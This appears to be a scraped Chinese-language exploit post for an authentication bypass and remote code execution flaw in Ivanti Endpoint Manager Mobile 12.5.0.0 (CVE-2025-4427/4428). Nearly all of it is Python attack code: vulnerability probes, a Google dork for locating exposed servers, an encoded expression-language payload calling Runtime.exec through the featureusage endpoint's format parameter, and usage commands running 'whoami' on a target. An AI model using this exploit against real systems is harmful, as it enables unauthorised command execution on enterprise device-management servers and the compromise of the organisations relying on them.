Ivanti Endpoint Manager Mobile 12.5.0.0 - 认证绕过漏洞分析

1
2
3
4

def detect_cve_2025_4427(self):
    """快速检测CVE-2025-4427"""
    payload = '%24%7b%32%2b%32%7d'  # ${2+2}
    url = f"{self.target}mifs/rs/api/v2/featureusage?format={payload}"

1
2
3

def detect_cve_2025_4428(self):
    """快速检测CVE-2025-4428"""
    admin_endpoints = ['/mifs/rs/api/v2/admin', '/admin', '/api/admin']

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

#!/usr/bin/env python3

# 利用标题: Ivanti Endpoint Manager Mobile 12.5.0.0 - 认证绕过
# Google搜索语法: inurl:/mifs "Ivanti" OR "EPM" OR "Endpoint Manager"
# 日期: 2025-01-21
# 软件链接: https://www.ivanti.com/products/endpoint-manager

import requests
import urllib3
import argparse
from urllib.parse import urljoin

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class IvantiExploit:
    def __init__(self, target):
        self.target = target.rstrip('/') + '/'
        self.session = requests.Session()
        self.session.verify = False
        
    def exploit_rce(self, command='id'):
        """通过CVE-2025-4427执行命令"""
        cmd_hex = command.encode().hex()
        cmd_encoded = ''.join(f'%{cmd_hex[i:i+2]}' for i in range(0, len(cmd_hex), 2))
        
        # RCE载荷
        payload = f'%24%7b%22%22%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%4d%65%74%68%6f%64%28%27%67%65%74%52%75%6e%74%69%6d%65%27%29%2e%69%6e%76%6f%6b%65%28%6e%75%6c%6c%29%2e%65%78%65%63%28%27{cmd_encoded}%27%29%7d'
        
        url = f"{self.target}mifs/rs/api/v2/featureusage?format={payload}"

1
2
3
4
5

# 检测漏洞
python3 CVE-2025-4427.py -t https://target-ivanti-epm.com

# 利用漏洞执行命令
python3 CVE-2025-4427.py -t https://target-ivanti-epm.com --exploit -c "whoami"